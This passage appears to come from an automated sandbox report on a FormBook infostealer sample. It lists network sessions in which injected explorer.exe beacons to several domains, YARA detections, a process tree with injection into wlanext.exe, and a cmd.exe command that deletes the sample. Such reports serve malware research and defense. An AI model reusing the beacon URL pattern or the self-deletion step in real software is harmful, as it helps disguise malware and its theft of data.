                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  6192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:48.045959949 CEST6020OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1
                                                                                  Host: www.rainboxs.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:48.182682037 CEST6021INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "609953da-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  7192.168.2.449767209.222.96.14680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:53.476977110 CEST6022OUTGET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.nobleandmarble.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:53.613686085 CEST6022INHTTP/1.1 302 Found
                                                                                  Date: Wed, 12 May 2021 18:03:53 GMT
                                                                                  Server: Apache
                                                                                  Location: http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP
                                                                                  Content-Length: 345
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 6c 65 61 6e 64 6d 61 72 62 6c 65 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 48 46 51 44 45 4c 5f 38 3d 78 54 69 4e 59 6a 70 7a 36 54 31 41 6b 37 6f 4f 50 63 31 52 55 39 7a 37 61 43 38 34 57 39 6e 6a 53 7a 70 71 71 55 34 58 61 6c 6a 71 6a 64 6b 7a 5a 75 5a 67 70 58 2b 45 73 46 41 51 79 7a 4e 79 4a 69 30 72 26 61 6d 70 3b 34 68 5f 48 43 76 3d 61 32 4a 44 61 30 58 78 32 32 49 70 57 78 6a 50 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&amp;4h_HCv=a2JDa0Xx22IpWxjP">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  8192.168.2.44976823.227.38.7480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:03.782355070 CEST6024OUTGET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.safegrinder.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:04.026160002 CEST6026INHTTP/1.1 403 Forbidden
                                                                                  Date: Wed, 12 May 2021 18:04:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  X-Sorting-Hat-PodId: 156
                                                                                  X-Sorting-Hat-ShopId: 46831239325
                                                                                  X-Dc: gcp-us-central1
                                                                                  X-Request-ID: e6a60d92-4f25-4e5a-82cb-4009d2ef67ba
                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  X-Download-Options: noopen
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  cf-request-id: 0a035919650000c2ef55899000000001
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 64e5913bdf2cc2ef-FRA
                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  9192.168.2.44977134.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:09.156018019 CEST6049OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1
                                                                                  Host: www.tecquestrian.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:09.293071032 CEST6050INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c49-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6800 Parent PID: 5832

                                                                                  General

                                                                                  Start time:20:02:19
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6840 Parent PID: 6800

                                                                                  General

                                                                                  Start time:20:02:20
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6840

                                                                                  General

                                                                                  Start time:20:02:25
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: wlanext.exe PID: 5876 Parent PID: 3424

                                                                                  General

                                                                                  Start time:20:02:40
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Imagebase:0x11c0000
                                                                                  File size:78848 bytes
                                                                                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  Analysis Process: cmd.exe PID: 6164 Parent PID: 5876

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: conhost.exe PID: 3980 Parent PID: 6164

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >